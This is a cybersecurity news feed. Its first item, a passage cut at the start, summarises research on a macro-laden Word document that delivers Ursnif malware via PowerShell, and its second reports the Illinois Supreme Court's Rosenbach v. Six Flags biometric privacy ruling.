Researchers received an alert containing a malicious VBA macro coming from a Microsoft Word document that asked users to enable macros. Once enabled, PowerShell is executed and then another PowerShell command downloads the Ursnif malware.

Registry data is then created for the next stage of execution in which the command executes PowerShell using Windows Management Instrumentation Command-line (WMIC). Among the APIs imported from kernel32 were GetCurrentProcess, VirtualAllocEx, GetCurrentThreadID, QueueUserAPC, OpenThread and SleepEx, according to the blog.

Though researchers identified a list of files dropped, they also noted, “Filenames are hardcoded in the first PowerShell command executed, and vary by sample. This means that these indicators aren't necessarily malicious on their own as filenames might collide with benign ones. If found with other indicators, it's likely a Ursnif infection.”

An extensive list of malicious documents and C2 server domains were also listed among the indicators of compromise.

"This is just the latest example of how antivirus and signature-based security tools are easily bypassed by creative hackers. There are hundreds of sophisticated hacker tools readily available that can be morphed into endless numbers of new-looking attacks with new signatures that aren’t recognized,” said Ray DeMeo, co-founder and COO, Virsec.

“We need to assume these threats will continue to get through and focus on stopping what the attackers are trying to achieve – corrupting applications, stealing valuable data or causing business disruption. We need to move beyond endless threat chasing to definitively protect the crown jewels – critical applications and infrastructure."

Categories: Cyber Risk News

Illinois Supreme Court Upholds Consumer Privacy Rights

Mon, 01/28/2019 - 17:02
Illinois Supreme Court Upholds Consumer Privacy Rights

In a landmark ruling of the Rosenbach v. Six Flags Entertainment Corp. case, the Illinois Supreme Court on January 25, 2019, decided to hold that consumers can sue for violations of their privacy under the state’s biometric privacy law, a decision that will likely have broad impact and open the door for consumers to file more lawsuits, according to Justin Kay, a partner at Drinker Biddle & Reath.

The case concerned a 14-year-old boy who visited a Six Flags park on a school field trip. Before receiving his season pass and gaining access to the park, the boy was asked to scan his thumb into a biometric data capture system. In her complaint, the mother of the boy said neither she nor her son were informed of the purpose and length of term for which his fingerprint had been collected. Because neither of them had signed a release for the taking of the biometric information, the suit claimed that Six Flags was in violation of the state of Illinois’ Biometric Privacy Information Act.

“The issue for the court to decide in Rosenbach was whether the Illinois Biometric Information Privacy Act would be a 'gotcha' statute, based on the failure of businesses to use magic words when using technology that incorporates biometrics,” said Kay. “With their ruling today, it is.”

The court concluded, “We hold that the questions of law certified by the circuit court must be answered in the affirmative. Contrary to the appellate court’s view, an individual need not allege some actual injury or adverse effect, beyond violation of his or her rights under the Act, in order to qualify as an 'aggrieved' person and be entitled to seek liquidated damages and injunctive relief pursuant to the Act. The judgment of the appellate court is therefore reversed, and the cause is remanded to the circuit court for further proceedings.”

As a result of the ruling, Kay predicts there will be a push for an amendment to the statute. “Efforts were made several years ago to amend the statute after the first spate of lawsuits against tech companies like Facebook related to facial recognition software, but those efforts failed. Last February, bills were again introduced in both the Illinois House and Senate to rein in the scope of the Illinois law, but they did not advance.

“Just as the Illinois statute served as a model for many of those proposals and was cited by legislators, the Supreme Court’s interpretation here is likely to have an impact on how those laws are drafted.”

Categories: Cyber Risk News

Pages